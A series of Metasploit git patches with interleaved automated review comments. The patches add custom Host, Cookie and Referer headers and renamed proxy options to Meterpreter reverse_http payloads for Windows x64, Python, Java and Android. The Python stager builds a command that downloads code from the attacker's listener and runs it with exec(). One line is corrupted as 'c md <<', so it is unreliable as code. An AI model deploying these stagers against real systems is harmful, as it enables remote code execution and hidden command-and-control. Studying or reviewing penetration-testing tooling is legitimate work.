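Review bot: The YARD block for asm_reverse_winhttp now documents `:url`, the `:proxy_*` options, `:custom_headers` and `:retry_wait`, but generate in the hunk above still passes the request path as `conf[:uri]` and never sets `:retry_wait`, while the `:verify_cert_hash` option that generate does set has been removed from the docs. This reads like a copy from the reverse_http variant; restore `# @option opts [String] :uri The URI to request during staging` and the `:verify_cert_hash` line, and drop `:retry_wait` unless asm_reverse_winhttp actually reads it — its body lies outside the hunk, so I cannot tell.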
@@ -431,15 +444,29 @@ module Payload::Windows::ReverseWinHttp_x64
 pop r9 ; dwBufferLength (4 = size of flags)
 mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
 call rbp
+
+ xor r8, r8 ; dwHeadersLen (0)
 ^
 end
- asm << %Q^
- winhttpsendrequest:
- mov rcx, rsi ; hRequest (request handle)
+ if custom_headers
+ asm << %Q^
+ call get_req_headers ; lpszHeaders (pointer to the custom headers)
+ db #{custom_headers}
+ get_req_headers:
+ pop rdx ; lpszHeaders
+ dec r8 ; dwHeadersLength (assume NULL terminated)
+ ^
+ else
+ asm << %Q^
 push rbx
 pop rdx ; lpszHeaders (NULL)
- xor r8, r8 ; dwHeadersLen (0)
+ ^
+ end
+
+
+ asm << %Q^
+ mov rcx, rsi ; hRequest (request handle)
 xor r9, r9 ; lpszVersion (NULL)
 push rbx ; stack alignment
 push rbx ; dwContext (0)
diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb
index 2c0479c9af..b3f56043cd 100644
--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -108,15 +108,19 @@ private
 cert_hash = "\x00" * CERT_HASH_SIZE
 cert_hash = opts[:ssl_cert_hash] if opts[:ssl_cert_hash]
+ custom_headers = opts[:custom_headers] || ''
+ custom_headers = to_str(custom_headers, custom_headers.length + 1)
+
 # add the HTTP specific stuff
- transport_data << proxy_host # Proxy host name
- transport_data << proxy_user # Proxy user name
- transport_data << proxy_pass # Proxy password
- transport_data << ua # HTTP user agent
- transport_data << cert_hash # SSL cert hash for verification
+ transport_data << proxy_host # Proxy host name
+ transport_data << proxy_user # Proxy user name
+ transport_data << proxy_pass # Proxy password
+ transport_data << ua # HTTP user agent
+ transport_data << cert_hash # SSL cert hash for verification
+ transport_data << custom_headers # any custom headers that the client needs
 # update the packing spec
- pack << 'A*A*A*A*A*'
+ pack << 'A*A*A*A*A*A*'
 end
 # return the packed transport information
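Review bot: The custom-header branch passes dwHeadersLength as -1 (`xor r8, r8` in the context above, then `dec r8`), which asks WinHttpSendRequest to measure lpszHeaders up to a NUL, so correctness depends on `db #{custom_headers}` ending in a wide NUL; asm_generate_wchar_array is not visible here, so confirm it appends the terminator or emit one explicitly after the `db`, otherwise the API reads past the embedded header bytes. The two consecutive blank lines added before the trailing `asm << %Q^` are one more than the rest of this hunk uses between statements. The surrounding asm heredoc and the method it belongs to start before this hunk.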
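Review bot: `to_str(custom_headers, custom_headers.length + 1)` sizes the field by character count, but the transport blob is packed byte-wise (`pack << 'A*A*A*A*A*A*'`), so a header value containing non-ASCII characters has more bytes than `length` reports; if to_str pads or truncates to the given size, the trailing bytes and the terminating NUL would be lost. `custom_headers.bytesize + 1` matches what is actually packed; to_str itself is outside this hunk, so check its contract before changing it. The enclosing method begins before the hunk.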
From 656babe9f4a0826b4398eaf7c66eac96418ec528 Mon Sep 17 00:00:00 2001
From: OJ
Date: Mon, 11 Sep 2017 17:20:50 +1000
Subject: [PATCH 170/254] Custom host header support in python meterp
---
 .../core/payload/python/meterpreter_loader.rb | 29 +++++++++++++++--
 lib/msf/core/payload/python/reverse_http.rb | 31 ++++++++++++++-----
 2 files changed, 49 insertions(+), 11 deletions(-)
diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb
index 95f2335763..2403273415 100644
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -30,7 +30,10 @@ module Payload::Python::MeterpreterLoader
 register_advanced_options([
 OptBool.new('MeterpreterTryToFork', [ true, 'Fork a new process if the functionality is available', true ]),
- OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ])
+ OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]),
+ OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+ OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+ OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
 ], self.class)
 end
@@ -88,10 +91,30 @@ module Payload::Python::MeterpreterLoader
 http_user_agent = opts[:http_user_agent] || ds['MeterpreterUserAgent']
 http_proxy_host = opts[:http_proxy_host] || ds['PayloadProxyHost'] || ds['PROXYHOST']
 http_proxy_port = opts[:http_proxy_port] || ds['PayloadProxyPort'] || ds['PROXYPORT']
+ http_header_host = opts[:header_host] || ds['HttpHeaderHost']
+ http_header_cookie = opts[:header_cookie] || ds['HttpHeaderCookie']
+ http_header_referer = opts[:header_referer] || ds['HttpHeaderReferer']
- # patch in the stageless http(s) connection url
- met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(opts[:url])}'") if opts[:url].to_s != ''
+ # The callback URL can be different to the one that we're receiving from the interface
+ # so we need to generate it
+ # TODO: move this to somewhere more common so that it can be used across payload types
+ callback_url = [
+ opts[:url].split(':')[0],
+ '://',
+ (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
+ ':',
+ (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
+ ds['LURI'].to_s,
+ opts[:uri].to_s,
+ '/'
+ ].join('')
+
+ # patch in the various payload related configuration
+ met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
 met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
+ met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
+ met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
+ met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
 if http_proxy_host.to_s != ''
 proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
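Review bot: `opts[:url].split(':')[0]` is no longer guarded: the removed line only patched HTTP_CONNECTION_URL `if opts[:url].to_s != ''`, whereas the new callback_url block calls split on `opts[:url]` unconditionally, so a nil or missing :url now raises NoMethodError instead of leaving the template default in place. The same unguarded split on `opts[:url]` is introduced again by the `@@ -98,6 +98,7 @@` hunk of the next commit (`uri = "/#{(...opts[:url]...).split('/')...`). Wrapping the callback_url construction and the HTTP_CONNECTION_URL substitution in `if opts[:url].to_s != ''` keeps the earlier behaviour; note also that `ds['LHOST']` is joined without brackets, so an IPv6 listener address would produce an unparseable URL unless something upstream already wraps it. The enclosing method starts before this hunk.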
diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb
index 361ecb3c8e..8f133d034d 100644
--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -14,7 +14,10 @@ module Payload::Python::ReverseHttp
 register_options(
 [
 OptString.new('PayloadProxyHost', [ false, "The proxy server's IP address" ]),
- OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ])
+ OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]),
+ OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+ OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+ OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
 ], self.class)
 end
@@ -24,11 +27,14 @@ module Payload::Python::ReverseHttp
 def generate(opts={})
 ds = opts[:datastore] || datastore
 opts.merge!({
- host: ds['LHOST'] || '127.127.127.127',
- port: ds['LPORT'],
- proxy_host: ds['PayloadProxyHost'],
- proxy_port: ds['PayloadProxyPort'],
- user_agent: ds['MeterpreterUserAgent']
+ host: ds['LHOST'] || '127.127.127.127',
+ port: ds['LPORT'],
+ proxy_host: ds['PayloadProxyHost'],
+ proxy_port: ds['PayloadProxyPort'],
+ user_agent: ds['MeterpreterUserAgent'],
+ header_host: ds['HttpHeaderHost'],
+ header_cookie: ds['HttpHeaderCookie'],
+ header_referer: ds['HttpHeaderReferer']
 })
 opts[:scheme] = 'http' if opts[:scheme].nil?
@@ -104,9 +110,18 @@ module Payload::Python::ReverseHttp
 cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n"
 end
+ headers = []
+ headers << "('User-Agent','#{var_escape.call(opts[:user_agent])}')"
+ headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie]
+ headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer]
+
 cmd << "o=ul.build_opener(*hs)\n"
- cmd << "o.addheaders=[('User-Agent','#{var_escape.call(opts[:user_agent])}')]\n"
- cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n"
+ c md << "o.addheaders=[#{headers.join(',')}]\n"
+ if opts[:header_host]
+ cmd << "exec(o.open(ul.Request('#{generate_callback_url(opts)}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())\n"
+ else
+ cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n"
+ end
 py_create_exec_stub(cmd)
 end
From f6e9b12b432da22625ed71f6d315619142d2ee79 Mon Sep 17 00:00:00 2001
From: OJ
Date: Mon, 11 Sep 2017 17:33:15 +1000
Subject: [PATCH 171/254] Make sure stageless is supported
---
 lib/msf/core/payload/python/meterpreter_loader.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb
index 2403273415..370e28dc51 100644
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -98,6 +98,7 @@ module Payload::Python::MeterpreterLoader
 # The callback URL can be different to the one that we're receiving from the interface
 # so we need to generate it
 # TODO: move this to somewhere more common so that it can be used across payload types
+ uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}"
 callback_url = [
 opts[:url].split(':')[0],
 '://',
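Review bot: The new `if opts[:header_cookie]`, `if opts[:header_referer]` and `if opts[:header_host]` checks treat an empty string as set, whereas the loader in `meterpreter_loader.rb` (the `@@ -88,10 +91,30 @@` hunk above) tests the same values with `.to_s != ''`; an option cleared to `''` would therefore emit `('Cookie','')` into addheaders or wrap the request in a Host header with an empty value. Using `unless opts[:header_cookie].to_s.empty?` (and likewise for the other two) keeps the two code paths consistent. The enclosing method starts before this hunk.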
@@ -105,7 +106,7 @@ module Payload::Python::MeterpreterLoader
 ':',
 (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
 ds['LURI'].to_s,
- opts[:uri].to_s,
+ uri,
 '/'
 ].join('')
From ac79cc9f78d17d60d6cc7e34a331fb4ec48523d5 Mon Sep 17 00:00:00 2001
From: OJ
Date: Wed, 13 Sep 2017 09:26:12 +1000
Subject: [PATCH 172/254] Fix up header string generation in transports
---
 lib/msf/core/payload/transport_config.rb | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)
diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index 1f5daf9b42..3c9972c0cf 100644
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -83,9 +83,15 @@ private
 def get_custom_headers(ds)
 headers = ""
- headers << "Host: #{ds['HttpHost']}\r\n" if ds['HttpHost']
- headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie']
- headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer']
+ headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost']
+ headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie']
+ headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer']
+
+ if headers.length > 0
+ headers
+ else
+ nil
+ end
 end
 def timeout_config(opts={})
From a5af21fa1ab959edb00ab789ef05122b51ebba41 Mon Sep 17 00:00:00 2001
From: Tim
Date: Wed, 13 Sep 2017 13:00:21 +0800
Subject: [PATCH 173/254] add http headers to Android/Java
---
 lib/msf/core/payload/android/reverse_http.rb | 12 ++++++++++++
 lib/msf/core/payload/java/reverse_http.rb | 11 +++++++++--
 lib/msf/core/payload_generator.rb | 2 +-
 3 files changed, 22 insertions(+), 3 deletions(-)
diff --git a/lib/msf/core/payload/android/reverse_http.rb b/lib/msf/core/payload/android/reverse_http.rb
index 4b9e7fcf78..e75e4618a3 100644
--- a/lib/msf/core/payload/android/reverse_http.rb
+++ b/lib/msf/core/payload/android/reverse_http.rb
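Review bot: In get_custom_headers the five-line `if headers.length > 0 / headers / else / nil / end` tail is the long form of `headers.empty? ? nil : headers`, and the nil return is a contract change every caller must now absorb (the `config.rb` hunk earlier in this series does so with `|| ''`). Each header line also interpolates the datastore value raw into `"Host: #{...}\r\n"`, so a value containing CR or LF yields extra or malformed header lines in the block; stripping line breaks, e.g. `ds['HttpHeaderHost'].to_s.delete("\r\n")`, or rejecting them when the option is validated keeps the block well-formed. The same raw interpolation appears in the Java builder's `@@ -64,6 +67,10 @@` hunk below (`HeaderHost=...\n`), where an embedded newline would break the key=value format.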
@@ -18,6 +18,18 @@ module Payload::Android::ReverseHttp
 include Msf::Payload::Android
 include Msf::Payload::UUID::Options
+ #
+ # Register reverse_http specific options
+ #
+ def initialize(*args)
+ super
+ register_advanced_options([
+ OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+ OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+ OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
+ ], self.class)
+ end
+
 #
 # Generate the transport-specific configuration
 #
diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb
index 1aff5eab2a..3e6cb675c8 100644
--- a/lib/msf/core/payload/java/reverse_http.rb
+++ b/lib/msf/core/payload/java/reverse_http.rb
@@ -24,8 +24,11 @@ module Payload::Java::ReverseHttp
 def initialize(*args)
 super
 register_advanced_options([
- Msf::OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
- Msf::OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)'])
+ OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
+ OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
+ OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+ OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+ OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']),
 ])
 end
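Review bot: The three `HttpHeaderHost`/`HttpHeaderCookie`/`HttpHeaderReferer` OptString definitions are now copied verbatim into this Android initialize, the Java hunk right below it, and the Python loader and stager hunks of the previous commit, each carrying the same description string; a single shared helper next to get_custom_headers in `transport_config.rb` would keep the names and descriptions from drifting between payload types. In the Java hunk the last entry ends with a trailing comma (`OptString.new('HttpHeaderReferer', [...]),` before `])`), which Ruby accepts but which differs from every other option list in this series.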
@@ -64,6 +67,10 @@ module Payload::Java::ReverseHttp
 c = ''
 c << "Spawn=#{ds["Spawn"] || 2}\n"
+ c << "HeaderUser-Agent=#{ds["MeterpreterUserAgent"]}\n" if ds["MeterpreterUserAgent"]
+ c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"]
+ c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"]
+ c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"]
 c << "URL=#{scheme}://#{ds['LHOST']}"
 c << ":#{ds['LPORT']}" if ds['LPORT']
 c << luri
diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index c8a3e0629f..a54fb39482 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -298,7 +298,7 @@ module Msf
 # @return [String] Java payload as a JAR or WAR file
 def generate_java_payload
 payload_module = framework.payloads.create(payload)
- payload_module.datastore.merge!(datastore)
+ payload_module.datastore.import_options_from_hash(datastore)
 case format
 when "raw", "jar"
 if payload_module.respond_to? :generate_jar
From 1fd7f7c8bc095306a02ea426b11a626b864f8632 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Wed, 20 Sep 2017 21:31:11 -0500
Subject: [PATCH 174/254] prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency, this also adds aliases where needed
---
 lib/msf/core/handler/reverse_http.rb | 60 +++++++++++++------
 lib/msf/core/handler/reverse_https_proxy.rb | 14 ++--
 lib/msf/core/payload/java/reverse_http.rb | 2 +-
 lib/msf/core/payload/multi/reverse_http.rb | 16 +++--
 .../core/payload/python/meterpreter_loader.rb | 6 +-
 lib/msf/core/payload/python/reverse_http.rb | 10 ++--
 lib/msf/core/payload/transport_config.rb | 12 ++--
 lib/msf/core/payload/windows/reverse_http.rb | 28 ++++-----
 .../core/payload/windows/reverse_winhttp.rb | 14 ++---
 .../core/payload/windows/x64/reverse_http.rb | 28 ++++-----
 .../payload/windows/x64/reverse_winhttp.rb | 14 ++---
 .../stagers/windows/reverse_https_proxy.rb | 24 ++++----
 12 files changed, 124 insertions(+), 104 deletions(-)
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 5b0db244b5..025e127608 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -52,16 +52,38 @@ module ReverseHttp
 register_advanced_options(
 [
-
- OptString.new('MeterpreterUserAgent', [false, 'The user-agent that the payload should use for communication', Rex::UserAgent.shortest]),
- OptString.new('MeterpreterServerName', [false, 'The server header that the handler will send in response to requests', 'Apache']),
- OptAddress.new('ReverseListenerBindAddress', [false, 'The specific IP address to bind to on the local system']),
- OptBool.new('OverrideRequestHost', [false, 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', false]),
- OptString.new('OverrideLHOST', [false, 'When OverrideRequestHost is set, use this value as the host name for secondary requests']),
- OptPort.new('OverrideLPORT', [false, 'When OverrideRequestHost is set, use this value as the port number for secondary requests']),
- OptString.new('OverrideScheme', [false, 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https']),
- OptString.new('HttpUnknownRequestResponse', [false, 'The returned HTML response body when the handler receives a request that is not from a payload', '

It works!

']),
- OptBool.new('IgnoreUnknownPayloads', [false, 'Whether to drop connections from payloads using unknown UUIDs', false])
+ OptAddress.new('ReverseListenerBindAddress',
+ 'The specific IP address to bind to on the local system'
+ ),
+ OptBool.new('OverrideRequestHost',
+ 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT',
+ ),
+ OptString.new('OverrideLHOST',
+ 'When OverrideRequestHost is set, use this value as the host name for secondary requests'
+ ),
+ OptPort.new('OverrideLPORT',
+ 'When OverrideRequestHost is set, use this value as the port number for secondary requests'
+ ),
+ OptString.new('OverrideScheme',
+ 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https'
+ ),
+ OptString.new('HttpUserAgent',
+ 'The user-agent that the payload should use for communication',
+ default: Rex::UserAgent.shortest,
+ aliases: ['MeterpreterUserAgent']
+ ),
+ OptString.new('HttpServerName',
+ 'The server header that the handler will send in response to requests',
+ default: 'Apache',
+ aliases: ['MeterpreterServerName']
+ ),
+ OptString.new('HttpUnknownRequestResponse',
+ 'The returned HTML response body when the handler receives a request that is not from a payload',
+ default: '

It works!

'
+ ),
+ OptBool.new('IgnoreUnknownPayloads',
+ 'Whether to drop connections from payloads using unknown UUIDs'
+ )
 ], Msf::Handler::ReverseHttp)
 end
@@ -204,7 +226,7 @@ module ReverseHttp
 raise ex if (ex)
- self.service.server_name = datastore['MeterpreterServerName']
+ self.service.server_name = datastore['HttpServerName']
 # Add the new resource
 service.add_resource((luri + "/").gsub("//", "/"),
@@ -245,14 +267,14 @@ protected
 info = {}
 return @proxy_settings if @proxy_settings
- if datastore['PayloadProxyHost'].to_s == ''
+ if datastore['HttpProxyHost'].to_s == ''
 @proxy_settings = info
 return @proxy_settings
 end
- info[:host] = datastore['PayloadProxyHost'].to_s
- info[:port] = (datastore['PayloadProxyPort'] || 8080).to_i
- info[:type] = datastore['PayloadProxyType'].to_s
+ info[:host] = datastore['HttpProxyHost'].to_s
+ info[:port] = (datastore['HttpProxyPort'] || 8080).to_i
+ info[:type] = datastore['HttpProxyType'].to_s
 uri_host = info[:host]
@@ -266,11 +288,11 @@ protected
 info[:info] = "socks=#{info[:info]}"
 else
 info[:info] = "http://#{info[:info]}"
- if datastore['PayloadProxyUser'].to_s != ''
- info[:username] = datastore['PayloadProxyUser'].to_s
+ if datastore['HttpProxyUser'].to_s != ''
+ info[:username] = datastore['HttpProxyUser'].to_s
 end
- if datastore['PayloadProxyPass'].to_s != ''
- info[:password] = datastore['PayloadProxyPass'].to_s
+ if datastore['HttpProxyPass'].to_s != ''
+ info[:password] = datastore['HttpProxyPass'].to_s
 end
 end
diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb
index 997316f688..1642460ad5 100644
--- a/lib/msf/core/handler/reverse_https_proxy.rb
+++ b/lib/msf/core/handler/reverse_https_proxy.rb
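Review bot: The rewritten `OverrideRequestHost` and `IgnoreUnknownPayloads` options in the `@@ -52,16 +52,38 @@` hunk drop the explicit `false` default that the replaced array form carried, and `OptBool.new('OverrideRequestHost', '...',` is left with a stray trailing comma after the description. Consumers such as `ds['OverrideRequestHost'] == true` in meterpreter_loader still behave with a nil value, but the option table no longer states its default, so `default: false` on both (and removing the comma) keeps it self-describing. The `@@ -245` and `@@ -266` hunks belong to proxy_settings, whose body continues outside the hunks shown.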
@@ -38,13 +38,13 @@ module ReverseHttpsProxy
 register_options(
 [
- OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
- OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
- OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]),
- OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]),
- OptEnum.new('PayloadProxyType', [true, 'The proxy type, HTTP or SOCKS', 'HTTP', ['HTTP', 'SOCKS']]),
- OptString.new('PayloadProxyUser', [ false, "An optional username for HTTP proxy authentication"]),
- OptString.new('PayloadProxyPass', [ false, "An optional password for HTTP proxy authentication"])
+ OptAddressLocal.new('LHOST', "The local listener hostname", default: "127.0.0.1"),
+ OptPort.new('LPORT', "The local listener port", default: 8443),
+ OptString.new('HttpProxyHost', "The proxy server's IP address", required: true, default: "127.0.0.1", aliases: ['PayloadProxyHost']),
+ OptPort.new('HttpProxyPort', "The proxy port to connect to", required: true, default: 8080, aliases: ['PayloadProxyPort']),
+ OptEnum.new('HttpProxyType', 'The proxy type, HTTP or SOCKS', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']),
+ OptString.new('HttpProxyUser', "An optional username for HTTP proxy authentication", aliases: ['PayloadProxyUser']),
+ OptString.new('HttpProxyPass', "An optional password for HTTP proxy authentication", aliases: ['PayloadProxyPass'])
 ], Msf::Handler::ReverseHttpsProxy)
 register_advanced_options(
diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb
index 3e6cb675c8..b0c1fc0d66 100644
--- a/lib/msf/core/payload/java/reverse_http.rb
+++ b/lib/msf/core/payload/java/reverse_http.rb
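Review bot: `OptEnum.new('HttpProxyType', 'The proxy type, HTTP or SOCKS', enums: ['HTTP', 'SOCKS'], aliases: [...])` drops both the `true` required flag and the `'HTTP'` default that the replaced array form carried, and the same `'HTTP'` default disappears from the multi, windows and windows x64 option lists in the `@@ -23,14 +23,13 @@` and `@@ -32,14 +32,14 @@` hunks below. Without a default, the stager in `modules/payloads/stagers/windows/reverse_https_proxy.rb` (`@@ -91,7 +91,7 @@` hunk) evaluates `datastore['HttpProxyType'].to_s == 'HTTP'` as false and falls into the `socks=` branch, silently changing the generated proxy string for anyone who never set the option. Restoring `required: true, default: 'HTTP'` here and `default: 'HTTP'` in the payload lists keeps the previous behaviour.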
@@ -67,7 +67,7 @@ module Payload::Java::ReverseHttp
 c = ''
 c << "Spawn=#{ds["Spawn"] || 2}\n"
- c << "HeaderUser-Agent=#{ds["MeterpreterUserAgent"]}\n" if ds["MeterpreterUserAgent"]
+ c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"]
 c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"]
 c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"]
 c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"]
diff --git a/lib/msf/core/payload/multi/reverse_http.rb b/lib/msf/core/payload/multi/reverse_http.rb
index 008f99f5a0..9d9f45de1c 100644
--- a/lib/msf/core/payload/multi/reverse_http.rb
+++ b/lib/msf/core/payload/multi/reverse_http.rb
@@ -23,14 +23,13 @@ module Payload::Multi::ReverseHttp
 def initialize(*args)
 super
 register_advanced_options([
- OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
- OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10],
- aliases: ['ReverseConnectRetries']),
- OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']),
- OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
- OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
- OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
- OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']])
+ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)'),
+ OptInt.new('StagerRetryCount', 'The number of times the stager should retry if the first connect fails', default: 10, aliases: ['ReverseConnectRetries']),
+ OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']),
+ OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']),
+ OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']),
+ OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']),
+ OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType'])
 ])
 end
@@ -67,4 +66,3 @@ module Payload::Multi::ReverseHttp
 end
 end
-
diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb
index 370e28dc51..0b8c97210b 100644
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -88,9 +88,9 @@ module Payload::Python::MeterpreterLoader
 end
 met.sub!("SESSION_GUID = \'\'", "SESSION_GUID = \'#{session_guid}\'")
- http_user_agent = opts[:http_user_agent] || ds['MeterpreterUserAgent']
- http_proxy_host = opts[:http_proxy_host] || ds['PayloadProxyHost'] || ds['PROXYHOST']
- http_proxy_port = opts[:http_proxy_port] || ds['PayloadProxyPort'] || ds['PROXYPORT']
+ http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent']
+ http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST']
+ http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT']
 http_header_host = opts[:header_host] || ds['HttpHeaderHost']
 http_header_cookie = opts[:header_cookie] || ds['HttpHeaderCookie']
 http_header_referer = opts[:header_referer] || ds['HttpHeaderReferer']
diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb
index 8f133d034d..9dac5a71cd 100644
--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -13,8 +13,8 @@ module Payload::Python::ReverseHttp
 super(info)
 register_options(
 [
- OptString.new('PayloadProxyHost', [ false, "The proxy server's IP address" ]),
- OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]),
+ OptString.new('HttpProxyHost', [ false, "The proxy server's IP address" ], aliases: ['PayloadProxyHost']),
+ OptPort.new('HttpProxyPort', [ true, "The proxy port to connect to", 8080 ], aliases: ['PayloadProxyHost']),
 OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
 OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
 OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
